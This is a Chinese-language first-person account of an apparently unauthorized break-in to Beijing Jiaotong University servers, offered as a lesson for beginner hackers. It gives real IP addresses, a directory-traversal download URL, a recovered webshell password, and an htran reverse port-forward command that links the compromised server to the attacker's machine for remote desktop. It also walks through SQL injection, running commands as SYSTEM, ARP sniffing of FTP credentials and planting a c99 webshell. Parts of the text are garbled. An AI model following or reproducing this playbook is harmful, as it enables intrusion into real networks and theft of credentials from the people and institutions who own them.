对北交大主站的典型嗅探入侵

这是一次非常典型的嗅探入侵过程，目标就是我所在的学校——北京交通大学的主站。本次入侵过程中并没有用到什么新的技术，主要就是让新手朋友们能够了解一下如何通过嗅探来达到入侵的目的，在渗透入侵过程中最重要的就是思路的运用嘛。

一、信息刺探

主站的IP地址为202.112.144.31，我大致的看了一下，全是静态页面，在同服务器上也没有其它的站点，服务器只开了21和80端口，使用的是Linux系统，主站的安全肯定没得说，最起码凭我是拿不下来的。于是我初步决定利用嗅探，在服务器的同C段IP地址中扫描80端口，发现只有一个202.12.144.32开放着，那我们就来看看它的情况吧。

我使用nmap对它的端口情况进行了扫描，我又ping了一下，显示TTL为125，可能使用的是Windows操作系统。通过目前的扫描情况来看，我们对服务器所掌握的信息有:Windows系统、网络服务只有FTP、Web。分别访问了一下80和8080端口，发现是学生处和教务处的网站，使用的脚本分别为asp和jsp，看来最有可能的突破口的就是Web了。我们先去看看学生处的网站吧，首先是jsp的不好搞，其次一般学校对于教务处的安全也会比较重视。

二、初探虚实

看到asp的站点，最先想到的就是SQL注入了，随手点开了一个新闻的链接，在网址的的后面加了个" ' "，提交后出现了未闭合引号的错误，确定网站存在注入漏洞，把这个链接地址直接扔到了啊D中进行检测，结果顺利得到了密码，接下来就是寻找后台了，使用wwwscan扫描了一下站点的目录结构，得到了manage和dbase这两个比较敏感的目录。在浏览器中访问，竟然发现可以遍历目录内容，得到了登录页面是login.asp，我又顺便访问了一下dbase，下载了dbase中的数据库文件，里面的管理员信息和利用注入点猜解出来的信息完全吻合。

登录网站后台，发现这个后台基本上没有什么权限，好在发现了还有eWebEditor编辑页面，利用这个网站内容编辑器拿webshell的方法有很多，我们点那个笑脸，添加一个表情，然后查看其地址，得到了eWebEditor的目录，我试了试默认密码、下载默认数据库，还有前段时间的上传页面的利用，但都失败了。而网站自己的那个后台，功能太过于简单了，利用这个后台搞破坏倒是可以，可是要想通过它获得webshell还是有一定难度的。

进行到这里，好像没什么可以利用的了，我便开始在上面瞎翻着，突然看到了ewebeditor下的上传目录uploadfile里有一个asa文件，莫非有“同道中人”以前来过了？试着访问了一下，哇，果真是我盼望已久的WebShell,但我们没有密码也只能看着这可爱的马儿干着急呀。

三、柳暗花明

思路到这里好像僵死了，我又想了想，既然已经有人进来过了，那就说明这个站点还是有可利用的地方，能够拿到webshell的，我继续在网站上瞎转悠，突然发现了有个资源下载的地方，链接的地址都是诸如这样，如果这个文件的FileUrl参数没有过滤“../”的话，那我们就可以通过“./”来跳出当前目录下载web目录中的其它文件了。

于是我就开始尝试以web根目录下的index.asp为标志，使用“./”来跳到站点根目录下，先试着提交“download.asp?FiLeUrl=.,/index.asp”，无法显示，跳出一级不可以，那就再问上跳一级，提交“download.asp?FileUrl一．./../index

asp”，终于出现了下载框，这下就好办了，我们可以下载刚才遇到的那位前辈的webshell，查看源代码就可以知道登录密码，从而登录他的webshell了。

根据那个webshell的相对路径来构造“download,asp?FiloUrl=../../ewebe ditor/uploadfile/2008611568654565.asa”，成功的下载到了webshell，我打开一看，全是乱码啊，连密码部分也给加密了。可是开头的“<%@LANGUAGE= Vbscript.Encode%>”却提示我们这是使用ScriptEncoder加密的，我在解密文件后，得到了密码为abc123。

四、终结服务器系统权限

赶紧找到那个webshell，填上abc123点击登录，先使用脚本木马束扫描～下开放的端口，发现比远程扫描时多出了3389，应该是限制了登录IP段的缘故吧。

WScript.Shell没有删除，我执行了一下“net start”，竟然没有发现任何杀毒软件、防火墙的服务，同服务器上还有一个tomcat的教务处的网站，要是运行在system权限下，那我们可就省得提权了，于是我开始着手寻找教务处网站的根目录，试着访问一下D盘根目录，没想到在这里可以跳转到服务器上的任意目录，可读可写！于是我找到“D妇xx\jgjwc”目录，发现里面根本就没有网站文件，都是一些二进制的可执行文件。找不到站点的绝对路径，该怎么办呢？我在服务器上瞎翻着，突然想到了那个“同道中人”的webshell里有个搜索的功能，于是就在教务处主页上找了个链接，以网址中一个特别长的文件名作为关键字来进行搜索，比如“infor_detail_window.jsp”，只搜索出了一个结果，是在D:\xxxkxxx\下的木马，在jsp webshell下执行whoami，发现权限是system。

虽然在jsp webshell下我们已经是系统权限了，可是要想进行嗅探还得图形界面才更方便一些，于是我开始尝试连接对方的远程桌面。在自己的电脑上扫描不到3389端口，而在脚本木马中扫描却是开放的，这说明网站限制了其它IP的登录，这个难不倒我，可以使用htran进行端口的转发。使用webshel响服务器上传htran，这里我传到了D:\xxx\sys.exe，然后在本地运行Htran，命令为“htran.exe-Listen 9999 8888”，就是开启9999和8888端口，端口9999用于监听。然后再在webshell执行“D:\xxx\sys,exe -Slavex.x.x.x 9999 127.0.0.1 3389”，就是将服务器的3389端口映射到我电脑的9999端口上，命令执行成功后我们就会在本地运行htran的CMD窗口中看到服务器已经连接到本地的9999端口了，通过连接本地的8888端口就可以顺利登录到服务器的远程桌面了。

五、嗅探拿下主站web权限

在教务处服务器上执行“tracert 202.112.144.3”，证明自己和主站是在同一交换环境下，满足嗅探的条件。我们安装好Cain和WinPc ap驱动后就开始针对202.112.144.31进行了嗅探，运气还不错，上午刚开始，下午便嗅出了目标的2个ftp用户，其中一个是webadmin，很像是网站的管理帐户啊，登录上去，发现ftp目录就是web目录。我传上去了一个c99，至此交大主站的web权限就已拿到手了。使用一些公布出来的本地溢出也都没有成功，我自己对Linux系统也不熟悉，于是就没有再尝试提权。